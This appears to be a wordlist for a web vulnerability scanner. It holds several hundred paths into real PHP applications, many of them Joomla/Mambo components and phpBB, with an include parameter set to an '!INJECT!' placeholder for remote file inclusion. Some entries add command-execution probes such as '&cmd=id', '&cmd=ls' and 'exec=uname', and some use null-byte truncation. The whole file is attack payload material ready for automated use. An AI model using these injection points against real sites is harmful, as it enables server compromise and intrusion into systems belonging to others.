-/_friendly/core/support/_load.php?friendly_path=!INJECT!
-/_functions.php?prefix=!INJECT!
-/_includes/settings.inc.php?approot=!INJECT!
-/_theme/breadcrumb.php?rootBase=!INJECT!
-/_wk/wk_lang.php?WK[wkPath]=!INJECT!
-/abf_js.php?abs_pfad=!INJECT!?&cmd=id
-/about.php?CONFIG[MWCHAT_Libs]=!INJECT!?
-/about.php?bibtexrootrel=!INJECT!?
-/aboutinfo.php?bibtexrootrel=!INJECT!?
-/acc.php?page=!INJECT!
-/access/login.php?path_to_root=!INJECT!
-/account.php?insPath=!INJECT!
-/accsess/login.php?path_to_root=!INJECT!
-/active/components/xmlrpc/client.php?c[components]=!INJECT!
-/ad_main.php?_mygamefile=!INJECT!
-/add.cgi.php?blog_theme=!INJECT!
-/add_link.php?blog_theme=!INJECT!
-/addpost_newpoll.php?addpoll=preview&thispath=!INJECT!
-/addressbook.php?GLOBALS[basedir]=!INJECT!?
-/addsite.php?returnpath=!INJECT!
-/addvip.php?msetstr["PROGSDIR"]=!INJECT!
-/adm/krgourl.php?DOCUMENT_ROOT=!INJECT!?
-/adm/my_statistics.php?DOCUMENT_ROOT=!INJECT!?
-/admin.loudmouth.php?mainframe=!INJECT!
-/admin.php?Madoa=!INJECT!?
-/admin.php?cal_dir=!INJECT!
-/admin.php?env_dir=!INJECT!
-/admin.php?lang=!INJECT!
-/admin.php?page[path]=!INJECT!?&cmd=ls
-/admin.php?submit=submit&form_include_template=!INJECT!
-/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
-/admin/ST_countries.php?include_path=!INJECT!?
-/admin/ST_platforms.php?include_path=!INJECT!?
-/admin/addentry.php?phpbb_root_path=!INJECT!?
-/admin/addons/archive/archive.php?adminfolder=!INJECT!
-/admin/admin.php?path=!INJECT!
-/admin/admin.php?site_url=!INJECT!
-/admin/admin_forgotten_password.php?root_folder_path=!INJECT!
-/admin/admin_news_bot.php?root_path=!INJECT!?
-/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=!INJECT!
-/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=!INJECT!
-/admin/admin_users.php?phpbb_root_path=!INJECT!
-/admin/auth.php?xcart_dir=!INJECT!?
-/admin/auth/secure.php?cfgProgDir=!INJECT!?
-/admin/autoprompter.php?CONFIG[BASE_PATH]=!INJECT!
-/admin/bin/patch.php?INSTALL_FOLDER=!INJECT!
-/admin/catagory.php?language=!INJECT!
-/admin/classes/pear/OLE/PPS.php?homedir=!INJECT!
-/admin/classes/pear/OLE/PPS/File.php?homedir=!INJECT!
-/admin/classes/pear/OLE/PPS/Root.php?homedir=!INJECT!
-/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=!INJECT!
-/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=!INJECT!
-/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=!INJECT!
-/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=!INJECT!
-/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=!INJECT!
-/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=!INJECT!
-/admin/code/index.php?load_page=!INJECT!
-/admin/comment.php?config[installdir]=!INJECT!
-/admin/common-menu.php?CONF[local_path]=!INJECT!
-/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=!INJECT!?
-/admin/config_settings.tpl.php?include_path=!INJECT!?&cmd=id
-/admin/directory.php?config[installdir]=!INJECT!
-/admin/doeditconfig.php?thispath=../includes&config[path]=!INJECT!
-/admin/frontpage_right.php?loadadminpage=!INJECT!
-/admin/header.php?loc=!INJECT!
-/admin/inc/add.php?format_menue=!INJECT!
-/admin/inc/change_action.php?format_menue=!INJECT!
-/admin/include/common.php?commonIncludePath=!INJECT!?
-/admin/include/header.php?repertoire=!INJECT!?
-/admin/include/lib.module.php?mod_root=!INJECT!
-/admin/includes/admin_header.php?level=!INJECT!?
-/admin/includes/author_panel_header.php?level=!INJECT!?
-/admin/includes/header.php?bypass_installed=1&secure_page_path=!INJECT!%00
-/admin/includes/spaw/spaw_control.class.php?spaw_root=!INJECT!?
-/admin/index.php?path_to_script=!INJECT!?&cmd=ls
-/admin/index.php?pg=!INJECT!?
-/admin/index.php?xtrphome=!INJECT!
-/admin/index_sitios.php?_VIEW=!INJECT!
-/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=!INJECT!
-/admin/login.php?absolute_path=!INJECT!
-/admin/news.admin.php?path_to_script=!INJECT!?&cmd=ls
-/admin/news.php?language=!INJECT!
-/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=!INJECT!
-/admin/sendmsg.php?config[installdir]=!INJECT!
-/admin/setup/level2.php?dir=!INJECT!
-/admin/system/config/conf-activation.php?site_path=!INJECT!
-/admin/system/include.php?skindir=!INJECT!
-/admin/system/include.php?start=1&skindir=!INJECT!
-/admin/system/menu/item.php?site_path=!INJECT!
-/admin/system/modules/conf_modules.php?site_path=!INJECT!
-/admin/templates/template_thumbnail.php?thumb_template=!INJECT!
-/admin/testing/tests/0004_init_urls.php?init_path=!INJECT!?&
-/admin/themes.php?config[installdir]=!INJECT!
-/admin/tools/utf8conversion/index.php?path=!INJECT!?
-/admin/user_user.php?language=!INJECT!
-/admincp/auth/checklogin.php?cfgProgDir=!INJECT!
-/admincp/auth/secure.php?cfgProgDir=!INJECT!
-/adminhead.php?path[docroot]=!INJECT!
-/admini/admin.php?INC=!INJECT!?
-/admini/index.php?INC=!INJECT!?
-/administrator/admin.php?site_absolute_path=!INJECT!?
-/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/administrator/components/com_color/admin.color.php?mosConfig_live_site=!INJECT!?
-/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!INJECT!?
-/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=!INJECT!
-/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=!INJECT!
-/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=!INJECT!
-/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_jreactions/langset.php?comPath=!INJECT!?
-/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=!INJECT!?
-/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=!INJECT!
-/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=!INJECT!
-/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=!INJECT!?
-/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=!INJECT!
-/administrator/components/com_webring/admin.webring.docs.php?component_dir=!INJECT!?
-/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=!INJECT!
-/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=!INJECT!
-/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=!INJECT!?
-/administrator/menu_add.php?site_absolute_path=!INJECT!?
-/administrator/menu_operation.php?site_absolute_path=!INJECT!?
-/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=!INJECT!
-/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=!INJECT!?
-/adodb/adodb-errorpear.inc.php?ourlinux_root_path=!INJECT!
-/adodb/adodb-pear.inc.php?ourlinux_root_path=!INJECT!
-/adodb/adodb.inc.php?path=!INJECT!
-/advanced_comment_system/admin.php?ACS_path=!INJECT!?
-/advanced_comment_system/index.php?ACS_path=!INJECT!?
-/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=!INJECT!?
-/agenda.php3?rootagenda=!INJECT!
-/agenda2.php3?rootagenda=!INJECT!
-/aides/index.php?page=!INJECT!?
-/ains_main.php?ains_path=!INJECT!
-/ajax/loadsplash.php?full_path=!INJECT!
-/ajouter.php?include=!INJECT!?
-/akarru.gui/main_content.php?bm_content=!INJECT!
-/akocomments.php?mosConfig_absolute_path=!INJECT!
-/amazon/cart.php?cmd=add&asin=!INJECT!
-/amazon/index.php?lang=!INJECT!
-/amazon/info.php?asin=!INJECT!
-/annonce.php?page=!INJECT!?&cmd=id
-/announcements.php?phpraid_dir=!INJECT!
-/anzagien.php?config[root_ordner]=!INJECT!?cmd=id
-/apbn/templates/head.php?APB_SETTINGS[template_path]=!INJECT!
-/api.php?t_path_core=!INJECT!?&cmd=id
-/apps/apps.php?app=!INJECT!
-/appserv/main.php?appserv_root=!INJECT!
-/arab3upload/customize.php?path=!INJECT!?&cmd=pwd
-/arab3upload/initialize.php?path=!INJECT!?&cmd=pwd
-/arash_lib/class/arash_gadmin.class.php?arashlib_dir=!INJECT!
-/arash_lib/class/arash_sadmin.class.php?arashlib_dir=!INJECT!
-/arash_lib/include/edit.inc.php?arashlib_dir=!INJECT!
-/arash_lib/include/list_features.inc.php?arashlib_dir=!INJECT!
-/archive.php?scriptpath=!INJECT!?
-/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=!INJECT!%00
-/artlist.php?root_path=!INJECT!
-/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=!INJECT!?cmd
-/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
-/athena.php?athena_dir=!INJECT!
-/auction/auction_common.php?phpbb_root_path=!INJECT!
-/auction/includes/converter.inc.php?include_path=!INJECT!?
-/auction/includes/messages.inc.php?include_path=!INJECT!?
-/auction/includes/settings.inc.php?include_path=!INJECT!?
-/auction/phpAdsNew/view.inc.php?phpAds_path=!INJECT!
-/auth.cookie.inc.php?da_path=!INJECT!
-/auth.header.inc.php?da_path=!INJECT!
-/auth.sessions.inc.php?da_path=!INJECT!
-/auth/auth.php?phpbb_root_path=!INJECT!
-/auth/auth_phpbb/phpbb_root_path=!INJECT!
-/authenticate.php?default_path_for_themes=!INJECT!?
-/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=!INJECT!
-/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=!INJECT!
-/auto_check_renewals.php?installed_config_file=!INJECT!?cmd=ls
-/autoindex.php?cfg_file=!INJECT!?
-/awzmb/adminhelp.php?Setting[OPT_includepath]=!INJECT!
-/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=!INJECT!
-/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=!INJECT!
-/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=!INJECT!
-/awzmb/modules/help.incl.php?Setting[OPT_includepath]=!INJECT!
-/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=!INJECT!
-/axoverzicht.cgi?maand=!INJECT!
-/b2-tools/gm-2-b2.php?b2inc=!INJECT!
-/b2verifauth.php?index=!INJECT!?
-/backend/addons/links/index.php?PATH=!INJECT!
-/basebuilder/src/main.inc.php?mj_config[src_path]=!INJECT!???
-/bb_admin.php?includeFooter=!INJECT!
-/beacon/language/1/splash.lang.php?languagePath=!INJECT!
-/beacon/language/1/splash.lang.php?languagePath=!INJECT!?
-/belegungsplan/jahresuebersicht.inc.php?root=!INJECT!
-/belegungsplan/monatsuebersicht.inc.php?root=!INJECT!
-/belegungsplan/tagesuebersicht.inc.php?root=!INJECT!
-/belegungsplan/wochenuebersicht.inc.php?root=!INJECT!
-/bemarket/postscript/postscript.php?p_mode=!INJECT!
-/biblioteca/bib_form.php?CLASSPATH=!INJECT!
-/biblioteca/bib_pldetails.php?CLASSPATH=!INJECT!
-/biblioteca/bib_plform.php?CLASSPATH=!INJECT!
-/biblioteca/bib_plsearchc.php?CLASSPATH=!INJECT!
-/biblioteca/bib_plsearchs.php?CLASSPATH=!INJECT!
-/biblioteca/bib_save.php?CLASSPATH=!INJECT!
-/biblioteca/bib_searchc.php?CLASSPATH=!INJECT!
-/biblioteca/bib_searchs.php?CLASSPATH=!INJECT!
-/biblioteca/edi_form.php?CLASSPATH=!INJECT!
-/biblioteca/edi_save.php?CLASSPATH=!INJECT!
-/biblioteca/gen_form.php?CLASSPATH=!INJECT!
-/biblioteca/gen_save.php?CLASSPATH=!INJECT!
-/biblioteca/lin_form.php?CLASSPATH=!INJECT!
-/biblioteca/lin_save.php?CLASSPATH=!INJECT!
-/biblioteca/luo_form.php?CLASSPATH=!INJECT!
-/biblioteca/luo_save.php?CLASSPATH=!INJECT!
-/biblioteca/sog_form.php?CLASSPATH=!INJECT!
-/biblioteca/sog_save.php?CLASSPATH=!INJECT!
-/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!
-/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
-/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
-/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
-/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!?
-/bild.php?config[root_ordner]=!INJECT!?&cmd=id
-/bin/qte_init.php?qte_root=!INJECT!?
-/bingoserver.php3?response_dir=!INJECT!
-/block.php?Include=!INJECT!
-/blocks/birthday.php?full_path=!INJECT!
-/blocks/events.php?full_path=!INJECT!
-/blocks/help.php?full_path=!INJECT!
-/blogcms/admin/media.php?DIR_LIBS=!INJECT!?
-/blogcms/admin/xmlrpc/server.php?DIR_LIBS=!INJECT!?
-/blogcms/index.php?DIR_PLUGINS=!INJECT!?
-/board/post.php?qb_path=!INJECT!
-/boitenews4/index.php?url_index=!INJECT!?
-/books/allbooks.php?home=!INJECT!
-/books/home.php?home=!INJECT!
-/books/mybooks.php?home=!INJECT!
-/bp_ncom.php?bnrep=!INJECT!
-/bp_ncom.php?bnrep=!INJECT!?
-/bp_news.php?bnrep=!INJECT!
-/bridge/enigma/E2_header.inc.php?boarddir=!INJECT!?
-/bridge/yabbse.inc.php?sourcedir=!INJECT!
-/bridges/SMF/logout.php?path_to_smf=!INJECT!
-/bu/bu_cache.php?bu_dir=!INJECT!?
-/bu/bu_claro.php?bu_dir=!INJECT!?
-/bu/bu_parse.php?bu_dir=!INJECT!?
-/bu/process.php?bu_dir=!INJECT!?
-/buddy.php?CONFIG[MWCHAT_Libs]=!INJECT!?
-/builddb.php?env_dir=!INJECT!
-/button/settings_sql.php?path=!INJECT!
-/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=!INJECT!?
-/cal.func.php?dir_edge_lang=!INJECT!
-/calcul-page.php?home=!INJECT!
-/calendar.php?cfg_dir=!INJECT!?
-/calendar.php?lang=!INJECT!
-/calendar.php?path_to_calendar=!INJECT!
-/calendar.php?vwar_root=!INJECT!?
-/calendar/demo/index.php?date=&v=!INJECT!?
-/calendar/payment.php?insPath=!INJECT!
-/calendario/cal_insert.php?CLASSPATH=!INJECT!
-/calendario/cal_save.php?CLASSPATH=!INJECT!
-/calendario/cal_saveactivity.php?CLASSPATH=!INJECT!
-/cart.php?lang_list=!INJECT!
-/cart_content.php?cart_isp_root=!INJECT!
-/catalogg/inludes/include_once.php?include_file=!INJECT!
-/catalogshop.php?mosConfig_absolute_path=!INJECT!
-/cdsagenda/modification/SendAlertEmail.php?AGE=!INJECT!?
-/cfagcms/themes/default/index.php?main=!INJECT!
-/ch_readalso.php?read_xml_include=!INJECT!
-/challenge.php?vwar_root=!INJECT!
-/change_preferences2.php?target=!INJECT!?
-/chat.php?CONFIG[MWCHAT_Libs]=!INJECT!?
-/chat.php?my[root]=!INJECT!?cm=id
-/chat/adminips.php?banned_file=!INJECT!
-/chat/users_popupL.php3?From=!INJECT!
-/checkout.php?abs_path=!INJECT!
-/checkout.php?abs_path=!INJECT!?
-/ciamos_path/modules/forum/include/config.php?module_cache_path='!INJECT!'
-/circ.php?include_path=!INJECT!?
-/circolari/cir_save.php?CLASSPATH=!INJECT!
-/citywriter/head.php?path=!INJECT!?
-/cl_files/index.php?path_to_calendar=!INJECT!?
-/claroline/auth/ldap/authldap.php?includePath=!INJECT!
-/claroline/phpbb/page_tail.php?includePath=!INJECT!
-/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=!INJECT!?
-/class.mysql.php?path_to_bt_dir=!INJECT!
-/class/Wiki/Wiki.php?c_node[class_path]=!INJECT!
-/class/jpcache/jpcache.php?_PSL[classdir]=!INJECT!?exec=uname
-/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=!INJECT!
-/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=!INJECT!
-/classes/Cache.class.php?rootdir=!INJECT!?
-/classes/Customer.class.php?rootdir=!INJECT!?
-/classes/Performance.class.php?rootdir=!INJECT!?
-/classes/Project.class.php?rootdir=!INJECT!?
-/classes/Representative.class.php?rootdir=!INJECT!?
-/classes/User.class.php?rootdir=!INJECT!?
-/classes/admin_o.php?absolutepath=!INJECT!
-/classes/adodbt/sql.php?classes_dir=!INJECT!
-/classes/adodbt/sql.php?classes_dir=!INJECT!?
-/classes/board_o.php?absolutepath=!INJECT!
-/classes/class_admin.php?PathToComment=!INJECT!?
-/classes/class_comments.php?PathToComment=!INJECT!?
-/classes/class_mail.inc.php?path_to_folder=!INJECT!
-/classes/common.php?rootdir=!INJECT!?
-/classes/core/language.php?rootdir=!INJECT!
-/classes/dev_o.php?absolutepath=!INJECT!
-/classes/file_o.php?absolutepath=!INJECT!
-/classes/html/com_articles.php?absolute_path=!INJECT!
-/classes/phpmailer/class.cs_phpmailer.php?classes_dir=!INJECT!
-/classes/query.class.php?baseDir=!INJECT!
-/classes/tech_o.php?absolutepath=!INJECT!
-/classified.php?insPath=!INJECT!
-/classified_right.php?language_dir=!INJECT!
-/classifieds/index.php?lowerTemplate=!INJECT!
-/clear.php?bibtexrootrel=!INJECT!?
-/clearinfo.php?bibtexrootrel=!INJECT!?
-/click.php?dir=!INJECT!?
-/client.php?dir=!INJECT!
-/client/faq_1/PageController.php?dir=!INJECT!
-/clients/index.php?src=!INJECT!
-/cls_fast_template.php?fname=!INJECT!
-/cm68news/engine/oldnews.inc.php?addpath=!INJECT!?&
-/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=!INJECT!?
-/cms/meetweb/classes/ManagerResource.class.php?root_path=!INJECT!
-/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=!INJECT!
-/cms/meetweb/classes/RegForm.class.php?root_path=!INJECT!
-/cms/meetweb/classes/RegResource.class.php?root_path=!INJECT!
-/cms/meetweb/classes/RegRightsResource.class.php?root_path=!INJECT!
-/cms/meetweb/classes/modules.php?root_path=!INJECT!
-/cms/modules/form.lib.php?sourceFolder=!INJECT!?
-/cms/system/openengine.php?oe_classpath=!INJECT!???
-/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=!INJECT!?
-/cn_config.php?tpath=!INJECT!?
-/coast/header.php?sections_file=!INJECT!?
-/code/berylium-classes.php?beryliumroot=!INJECT!?
-/code/display.php?admindir=!INJECT!?
-/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=!INJECT!
-/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
-/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=!INJECT!?
-/com_media_library/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
-/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
-/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
-/comments.php?AMG_serverpath=!INJECT!
-/comments.php?scriptpath=!INJECT!?
-/common.inc.php?CFG[libdir]=!INJECT!
-/common.inc.php?CFG[libdir]=!INJECT!?
-/common.inc.php?base_path=!INJECT!
-/common.php?db_file=!INJECT!
-/common.php?dir=!INJECT!
-/common.php?ezt_root_path=!INJECT!?
-/common.php?include_path=!INJECT!
-/common.php?livealbum_dir=!INJECT!?
-/common.php?locale=!INJECT!
-/common.php?phpht_real_path=!INJECT!?
-/common/db.php?commonpath=!INJECT!?
-/common/func.php?CommonAbsD=!INJECT!?
-/common/func.php?CommonAbsDir=!INJECT!
-/community/Offline.php?sourcedir=!INJECT!?
-/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=!INJECT!
-/components/calendar/com_calendar.php?absolute_path=!INJECT!?
-/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
-/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=!INJECT!
-/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=!INJECT!
-/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=!INJECT!
-/components/com_articles.php?absolute_path=!INJECT!?
-/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=!INJECT!
-/components/com_calendar.php?absolute_path=!INJECT!?
-/components/com_cpg/cpg.php?mosConfig_absolute_path=!INJECT!?
-/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=!INJECT!
-/components/com_facileforms/facileforms.frame.php?ff_compath=!INJECT!
-/components/com_forum/download.php?phpbb_root_path=!INJECT!
-/components/com_galleria/galleria.html.php?mosConfig_absolute_path=!INJECT!
-/components/com_guestbook.php?absolute_path=!INJECT!?
-/components/com_hashcash/server.php?mosConfig_absolute_path=!INJECT!?
-/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=!INJECT!
-/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=!INJECT!
-/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=!INJECT!
-/components/com_joomlaboard/file_upload.php?sbp=!INJECT!?
-/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=!INJECT!?
-/components/com_lm/archive.php?mosConfig_absolute_path=!INJECT!?
-/components/com_mambowiki/MamboLogin.php?IP=!INJECT!?
-/components/com_minibb.php?absolute_path=!INJECT!
-/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=!INJECT!
-/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=!INJECT!
-/components/com_mospray/scripts/admin.php?basedir=!INJECT!?&cmd=id
-/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=!INJECT!
-/components/com_mp3_allopass/allopass.php?mosConfig_live_site=!INJECT!
-/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
-/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=!INJECT!?
-/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=!INJECT!
-/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
-/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=!INJECT!
-/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
-/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
-/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=!INJECT!?
-/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=!INJECT!
-/components/com_smf/smf.php?mosConfig_absolute_path=!INJECT!
-/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=!INJECT!
